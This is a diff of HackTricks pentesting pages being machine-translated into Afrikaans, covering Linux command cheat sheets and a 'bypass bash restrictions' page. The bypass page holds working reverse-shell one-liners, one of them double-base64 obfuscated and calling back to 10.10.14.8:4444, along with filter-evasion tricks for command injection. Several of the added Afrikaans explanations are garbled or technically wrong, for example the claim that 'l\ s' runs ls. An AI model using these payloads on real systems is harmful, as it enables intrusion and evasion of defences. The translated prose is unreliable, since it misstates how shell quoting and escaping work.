To ignore case sensitivity and search for a pattern regardless of case, use the `-i` option: + +```bash +grep -i pattern file +``` + +For example, to search for the word "password" in the file `example.txt` without considering case sensitivity, you would use: + +```bash +grep -i password example.txt +``` + +### Displaying Line Numbers + +To display line numbers along with the matching lines, use the `-n` option: + +```bash +grep -n pattern file +``` + +For example, to search for the word "password" in the file `example.txt` and display the line numbers, you would use: + +```bash +grep -n password example.txt +``` + +### Searching Recursively + +To search for a pattern recursively in all files within a directory and its subdirectories, use the `-r` option: + +```bash +grep -r pattern directory +``` + +For example, to search for the word "password" recursively in all files within the `documents` directory, you would use: + +```bash +grep -r password documents +``` + +### Inverting the Match + +To invert the match and display lines that do not contain the pattern, use the `-v` option: + +```bash +grep -v pattern file +``` + +For example, to search for lines in the file `example.txt` that do not contain the word "password", you would use: + +```bash +grep -v password example.txt +``` + +### Using Regular Expressions + +Grep supports the use of regular expressions for more advanced pattern matching. To use regular expressions, use the `-E` option: + +```bash +grep -E "regex" file +``` + +For example, to search for lines in the file `example.txt` that start with "password" followed by any three characters, you would use: + +```bash +grep -E "^password..." example.txt +``` + +These are just a few examples of how grep can be used. It is a versatile tool that can be combined with other commands to perform complex text searches and manipulations. ```bash #Extract emails from file grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt 
@@ -254,9 +374,83 @@ grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt #Extract ISBN Numbers egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt ``` +## Vind -## Find +The `find` command is used to search for files and directories in a specified location. It can be used with various options to filter the search results based on different criteria. +### Syntax: + +``` +find [path] [expression] +``` + +### Voorbeelde: + +1. Vind alle bestande in die huidige gids: + + ``` + find . + ``` + +2. Vind alle bestande met 'txt' in die naam: + + ``` + find . -name "*txt*" + ``` + +3. Vind alle leë gids in die huidige gids: + + ``` + find . -type d -empty + ``` + +4. Vind alle bestande wat groter is as 1 MB: + + ``` + find . -size +1M + ``` + +5. Vind alle bestande wat in die afgelope 7 dae gewysig is: + + ``` + find . -mtime -7 + ``` + +6. Vind alle bestande wat eienaarskap is deur 'gebruiker': + + ``` + find . -user gebruiker + ``` + +7. Vind alle bestande wat uitvoerbaar is: + + ``` + find . -type f -executable + ``` + +8. Vind alle bestande wat deur 'groep' besit word: + + ``` + find . -group groep + ``` + +9. Vind alle bestande wat nie deur 'gebruiker' besit word nie: + + ``` + find . ! -user gebruiker + ``` + +10. Vind alle bestande wat die afgelope 30 minute gewysig is: + + ``` + find . -mmin -30 + ``` + +### Opmerkings: + +- Die `path`-argument spesifiseer die beginpunt van die soektog. As dit nie opgegee word nie, sal die huidige gids gebruik word. +- Die `expression`-argument bevat die verskillende opsies en voorwaardes wat gebruik word om die soektog te verfyn. +- Die `find`-opdrag kan baie kragtig wees, so wees versigtig wanneer jy dit gebruik. ```bash # Find SUID set files. find / -perm /u=s -ls 2>/dev/null 
@@ -285,25 +479,153 @@ find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /p # Found Newer directory only and sort by time. (depth = 5) find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less ``` +## Nmap soekhulp -## Nmap search help +Nmap is 'n kragtige en veelsydige netwerk skandering hulpmiddel wat gebruik kan word om netwerktoestelle te ontdek en hul veiligheid te ondersoek. Hier is 'n paar nuttige opdragte en voorbeelde om jou te help om Nmap effektief te gebruik: +### Basiese skandering + +Om 'n basiese skandering uit te voer, gebruik die volgende opdrag: + +``` +nmap +``` + +Vervang `` met die IP-adres of die domeinnaam van die teikenstelsel. + +### Spesifieke poorte skandering + +As jy spesifieke poorte wil skandeer, gebruik die `-p` vlag gevolg deur die poortnommers. Byvoorbeeld: + +``` +nmap -p 80,443 +``` + +Hierdie opdrag sal slegs poorte 80 en 443 op die teikenstelsel skandeer. + +### Volledige skandering + +Om 'n volledige skandering uit te voer, gebruik die `-p-` vlag. Byvoorbeeld: + +``` +nmap -p- +``` + +Hierdie opdrag sal alle poorte op die teikenstelsel skandeer. + +### Skandering van spesifieke protokolle + +As jy slegs spesifieke protokolle wil skandeer, gebruik die `--top-ports` vlag gevolg deur die aantal poorte wat jy wil skandeer. Byvoorbeeld: + +``` +nmap --top-ports 10 +``` + +Hierdie opdrag sal die top 10 poorte op die teikenstelsel skandeer. + +### Aggressiewe skandering + +Om 'n aggressiewe skandering uit te voer, gebruik die `-A` vlag. Byvoorbeeld: + +``` +nmap -A +``` + +Hierdie opdrag sal verskillende inligting oor die teikenstelsel versamel, soos bedryfstelsel, dienste, en versie-inligting. + +### Stil skandering + +As jy 'n stil skandering wil uitvoer, gebruik die `-sS` vlag. 
Byvoorbeeld: + +``` +nmap -sS +``` + +Hierdie opdrag sal probeer om die skandering so stil as moontlik uit te voer. + +### Skandering van subnetwerk + +Om 'n subnetwerk te skandeer, gebruik die `/` gevolg deur die subnetmasker. Byvoorbeeld: + +``` +nmap / +``` + +Vervang `` met die subnetwerkadres en `` met die subnetmasker. + +### Uitvoer na 'n lêer + +Om die uitvoer na 'n lêer te stuur, gebruik die `>` gevolg deur die lêernaam. Byvoorbeeld: + +``` +nmap > uitvoer.txt +``` + +Hierdie opdrag sal die uitvoer van die skandering stuur na 'n lêer genaamd "uitvoer.txt". + +Dit is slegs 'n paar voorbeelde van hoe jy Nmap kan gebruik. Daar is baie meer funksies en opsies beskikbaar. Vir meer inligting, gebruik die `nmap --help` opdrag of besoek die [Nmap-dokumentasie](https://nmap.org/docs.html). ```bash #Nmap scripts ((default or version) and smb)) nmap --script-help "(default or version) and *smb*" locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb nmap --script-help "(default or version) and smb)" ``` - ## Bash +Bash is die standaard skulpry in die meeste Linux-stelsels en is 'n kragtige en veelsydige skulpry wat gebruik kan word vir verskeie take. Hier is 'n paar nuttige opdragte en tegnieke wat jy kan gebruik om jou Linux-stelsel te hardloop en te beveilig: + +### Opdragte + +- `ls`: Lys die inhoud van 'n gids. +- `cd`: Verander die huidige gids. +- `pwd`: Druk die pad van die huidige gids af. +- `mkdir`: Skep 'n nuwe gids. +- `rm`: Verwyder 'n lêer of gids. +- `cp`: Kopieer 'n lêer of gids. +- `mv`: Verskuif of hernoem 'n lêer of gids. +- `cat`: Druk die inhoud van 'n lêer af. +- `grep`: Soek na 'n patroon in 'n lêer. +- `chmod`: Verander die toestemmings van 'n lêer of gids. +- `chown`: Verander die eienaar van 'n lêer of gids. +- `ps`: Lys aktiewe prosesse. +- `kill`: Beëindig 'n proses. +- `top`: Wys 'n lys van aktiewe prosesse en hul gebruik van hulpbronne. +- `df`: Wys inligting oor die beskikbare diskruimte. 
+- `du`: Wys die grootte van 'n lêer of gids. +- `history`: Wys die geskiedenis van uitgevoerde opdragte. + +### Tegnieke + +- **Pyp**: Gebruik die `|`-teken om die uitset van die een opdrag as die inset van 'n ander opdrag te gebruik. Byvoorbeeld: `ls -l | grep .txt` sal alle lêers met die `.txt`-uitbreiding in die huidige gids wys. +- **Redirigeer**: Gebruik die `>`-teken om die uitset van 'n opdrag na 'n lêer te stuur. Byvoorbeeld: `ls > lêers.txt` sal die inhoud van die huidige gids na 'n lêer met die naam `lêers.txt` skryf. +- **Agtergrond**: Voeg die `&`-teken by die einde van 'n opdrag om dit in die agtergrond uit te voer. Byvoorbeeld: `ping google.com &` sal die `ping`-opdrag in die agtergrond uitvoer en jou die beheer oor die skulpry teruggee. +- **Vars**: Gebruik die `$`-teken om die waarde van 'n veranderlike op te roep. Byvoorbeeld: `echo $HOME` sal die pad van jou tuisgids afdruk. +- **Lusse**: Gebruik die `for`- of `while`-opdragte om herhalende take uit te voer. Byvoorbeeld: `for i in {1..5}; do echo $i; done` sal die getalle 1 tot 5 afdruk. + +Met hierdie opdragte en tegnieke kan jy jou Linux-stelsel effektief bestuur en beveilig. ```bash #All bytes inside a file (except 0x20 and 0x00) for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done ``` - ## Iptables +Iptables is 'n kragtige hulpmiddel wat gebruik word vir die konfigurasie van die firewall in Linux-stelsels. Dit stel gebruikers in staat om verkeer te beheer deur middel van verskillende reëls en beleide. Hier is 'n paar nuttige opdragte wat met iptables gebruik kan word: + +### Opdragte + +- `iptables -L`: Gee 'n lys van alle huidige iptables-reëls. +- `iptables -F`: Vee alle huidige iptables-reëls skoon. +- `iptables -A -p --dport -j `: Voeg 'n nuwe reël by die gespesifiseerde ketting. 
Die `` parameter verwys na die ketting waarin die reël geplaas moet word, `` verwys na die protokol van die verkeer (byvoorbeeld tcp of udp), `` verwys na die poortnommer en `` verwys na die aksie wat geneem moet word (byvoorbeeld ACCEPT, DROP of REJECT). +- `iptables -D `: Verwyder die gespesifiseerde reël uit die ketting. +- `iptables -P `: Stel die verstekbeleid in vir die gespesifiseerde ketting. Die `` parameter kan ingestel word as ACCEPT, DROP of REJECT. + +### Voorbeelde + +- `iptables -A INPUT -p tcp --dport 22 -j ACCEPT`: Voeg 'n reël by die INPUT-ketting om inkomende TCP-verkeer op poort 22 toe te laat. +- `iptables -A INPUT -p tcp --dport 80 -j DROP`: Voeg 'n reël by die INPUT-ketting om inkomende TCP-verkeer op poort 80 te blokkeer. +- `iptables -A OUTPUT -p udp --dport 53 -j ACCEPT`: Voeg 'n reël by die OUTPUT-ketting om uitgaande UDP-verkeer op poort 53 toe te laat. + +Dit is slegs 'n paar voorbeelde van die gebruik van iptables. Daar is baie meer funksies en opsies beskikbaar wat dit 'n kragtige instrument maak vir die beheer van verkeer in Linux-stelsels. ```bash #Delete curent rules and chains iptables --flush @@ -334,25 +656,24 @@ iptables -P INPUT DROP iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md index 44c69dedd..727b52d81 100644 --- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md @@ -1,39 +1,46 @@ -# Bypass Linux Restrictions +# Omseil Linux Beperkings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Common Limitations Bypasses - -### Reverse Shell +## Algemene Beperkings Omseilings +### Omgekeerde Skulp ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` +### Kort Rev shell -### Short Rev shell +Hierdie is 'n kort rev shell wat gebruik kan word om 'n verbinding met 'n bediener te maak en beheer oor die doelwitstelsel te verkry. +```bash +bash -i >& /dev/tcp// 0>&1 +``` + +Vervang `` met die IP-adres van die bediener en `` met die poortnommer waarop die bediener luister. + +Hierdie bevel sal 'n interaktiewe bash-sessie skep wat deur die bediener beheer word. Dit stuur die standaard in- en uitvoer na die gespesifiseerde IP-adres en poort. ```bash #Trick from Dikline #Get a rev shell with 
@@ -41,9 +48,49 @@ echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)| #Then get the out of the rev shell executing inside of it: exec >&0 ``` +### Deurweeg Paaie en verbode woorde -### Bypass Paths and forbidden words +Om beperkings in Bash te omseil, kan jy verskeie paaie en verbode woorde gebruik. Hier is 'n paar tegnieke wat jy kan gebruik: +#### 1. Gebruik van absolute paaie + +In plaas van relatiewe paaie te gebruik, kan jy absolute paaie gebruik om beperkings te omseil. Byvoorbeeld, as die relatiewe pad `/bin/ls` verbode is, kan jy die absolute pad `/usr/bin/ls` gebruik om die `ls`-opdrag uit te voer. + +#### 2. Gebruik van omgekeerde skakels + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik om spesiale karakters te ontsnap. Byvoorbeeld, as die woord `ls` verbode is, kan jy die opdrag `l\ s` gebruik om dit uit te voer. + +#### 3. Gebruik van alternatiewe opdragname + +As 'n spesifieke opdragnaam verbode is, kan jy 'n alternatiewe opdragnaam gebruik om die beperking te omseil. Byvoorbeeld, as die opdrag `ls` verbode is, kan jy die opdrag `dir` gebruik om dieselfde funksionaliteit te verkry. + +#### 4. Gebruik van omgekeerde skakels in opdragname + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die opdragnaam self. Byvoorbeeld, as die opdragnaam `ls` verbode is, kan jy die opdragnaam `l\ s` gebruik om dit uit te voer. + +#### 5. Gebruik van omgekeerde skakels in padname + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die padnaam self. Byvoorbeeld, as die pad `/bin/ls` verbode is, kan jy die pad `/b\ in/ls` gebruik om die `ls`-opdrag uit te voer. + +#### 6. Gebruik van omgekeerde skakels in argumente + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die argumente van 'n opdrag. Byvoorbeeld, as die argument `file.txt` verbode is, kan jy die argument `file.t\ xt` gebruik om dit te omseil. + +#### 7. 
Gebruik van omgekeerde skakels in omgewingsveranderlikes + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in omgewingsveranderlikes. Byvoorbeeld, as die omgewingsveranderlike `PATH` verbode karakters bevat, kan jy omgekeerde skakels gebruik om die karakters te ontsnap. + +#### 8. Gebruik van wildcards + +Om beperkings te omseil, kan jy wildcards gebruik om opdragte uit te voer. Byvoorbeeld, as die opdrag `ls` verbode is, kan jy die opdrag `l*s` gebruik om dit uit te voer. + +#### 9. Gebruik van alternatiewe opdraguitvoerders + +As 'n spesifieke opdraguitvoerder verbode is, kan jy 'n alternatiewe opdraguitvoerder gebruik om die beperking te omseil. Byvoorbeeld, as die opdraguitvoerder `/bin/bash` verbode is, kan jy die opdraguitvoerder `/bin/sh` gebruik om dieselfde funksionaliteit te verkry. + +#### 10. Gebruik van omgekeerde skakels in opdraguitvoerder + +Om beperkings te omseil, kan jy omgekeerde skakels (`\`) gebruik in die opdraguitvoerder self. Byvoorbeeld, as die opdraguitvoerder `/bin/bash` verbode is, kan jy die opdraguitvoerder `/bin/b\ ash` gebruik om dit uit te voer. ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping 
@@ -98,9 +145,17 @@ mi # This will throw an error whoa # This will throw an error !-1!-2 # This will execute whoami ``` +### Bypass verbode spasies -### Bypass forbidden spaces +Hier is 'n paar tegnieke om verbode spasies in 'n opdrag te omseil: +1. Gebruik enkele aanhalingstekens: As jy enkele aanhalingstekens gebruik, sal die opdrag die spasie ignoreer en die res van die teks as een argument beskou. Byvoorbeeld: `ls' -la` sal die opdrag `ls -la` uitvoer. + +2. Gebruik backslashes: Deur 'n backslash voor die spasie te plaas, sal die spasie geïgnoreer word en die opdrag korrek uitgevoer word. Byvoorbeeld: `ls\ -la` sal dieselfde resultaat gee as `ls -la`. + +3. Gebruik dubbele aanhalingstekens: Dubbele aanhalingstekens kan gebruik word om die spasie te omhul en dit as een argument te beskou. Byvoorbeeld: `"ls -la"` sal dieselfde resultaat gee as `ls -la`. + +Dit is belangrik om te onthou dat hierdie tegnieke slegs werk vir opdragreëls wat deur die Bash-skootrekenaar geïnterpreteer word. Ander skootrekenaars kan verskillende sintaksis vereis. ```bash # {form} {cat,lol.txt} # cat lol.txt 
@@ -133,22 +188,110 @@ g # These 4 lines will equal to ping $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined uname!-1\-a # This equals to uname -a ``` +### Bypass rugsteek en sny -### Bypass backslash and slash +Hier is 'n paar tegnieke om rugsteek en sny beperkings in Linux te omseil: +#### Gebruik enkele aanhalingstekens + +As jy enkele aanhalingstekens gebruik in plaas van dubbele aanhalingstekens, sal die rugsteek en sny beperkings omseil word. Byvoorbeeld: + +```bash +echo 'Hello World' +``` + +#### Gebruik die `eval`-opdrag + +Die `eval`-opdrag kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +eval echo Hello\ World +``` + +#### Gebruik die `printf`-opdrag + +Die `printf`-opdrag kan ook gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +printf "Hello World\n" +``` + +#### Gebruik die `echo -e`-opdrag + +Die `echo -e`-opdrag kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +echo -e "Hello\tWorld" +``` + +#### Gebruik die `echo $'...'`-notasie + +Die `echo $'...'`-notasie kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +echo $'Hello\tWorld' +``` + +#### Gebruik die `cat`-opdrag + +Die `cat`-opdrag kan gebruik word om die rugsteek en sny beperkings te omseil. Byvoorbeeld: + +```bash +cat < mypipe & +opdrag2 < mypipe +``` + +In hierdie voorbeeld word 'n benoemde pyp met die naam `mypipe` geskep. Die uitvoer van `opdrag1` word na die pyp gestuur met behulp van die `>`-operateur. Die `&`-teken word gebruik om die proses in die agtergrond te plaas. Die `opdrag2` lees dan die data van die pyp met behulp van die `<`-operateur. + +Hierdie tegniek kan gebruik word om pype te skep sonder om die beperkings van die opdragskulp te omseil. + +#### 3. 
Gebruik van `socat` + +`socat` is 'n nuttige hulpmiddel wat gebruik kan word om data tussen verskillende strome te stuur. Jy kan dit gebruik om pype te skep en data tussen hulle te stuur. Hier is 'n voorbeeld van hoe jy dit kan doen: + +```bash +socat -u EXEC:"opdrag1",pty STDIO | opdrag2 +``` + +In hierdie voorbeeld word `socat` gebruik om 'n pyp te skep tussen `opdrag1` en `opdrag2`. Die `-u`-vlag word gebruik om die data onmiddellik te stuur sonder buffering. Die `EXEC`-opdragspesifikasie word gebruik om `opdrag1` uit te voer en die uitvoer daarvan na die pyp te stuur. Die `pty`-vlag word gebruik om 'n virtuele teletipe te skep. Die `STDIO`-vlag word gebruik om die data na die standaard invoer van `opdrag2` te stuur. + +Hierdie tegniek maak dit moontlik om pype te gebruik sonder om die beperkings van die opdragskulp te omseil. ```bash bash<<<$(base64 -d<<g` in a file 
@@ -346,22 +619,21 @@ ln /f* 'sh x' 'sh g' ``` +## Lees-Alleen/Geen Uitvoering/Beperkte Bash-Omzeiling -## Read-Only/Noexec/Distroless Bypass - -If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:** +As jy binne 'n lêersisteem met die **lees-alleen en geen-uitvoer beskerming** of selfs in 'n distrolose houer is, is daar steeds maniere om **arbitrêre bineêre lêers uit te voer, selfs 'n skul!:** {% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %} [bypass-fs-protections-read-only-no-exec-distroless](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/) {% endcontent-ref %} -## Chroot & other Jails Bypass +## Chroot & ander Jails-Omseiling {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md) {% endcontent-ref %} -## References & More +## Verwysings & Meer * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) @@ -371,21 +643,21 @@ If you are inside a filesystem with the **read-only and noexec protections** or
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-unix/privilege-escalation/exploiting-yum.md b/linux-unix/privilege-escalation/exploiting-yum.md index 620149dcd..7cb132fe3 100644 --- a/linux-unix/privilege-escalation/exploiting-yum.md +++ b/linux-unix/privilege-escalation/exploiting-yum.md @@ -1,33 +1,30 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
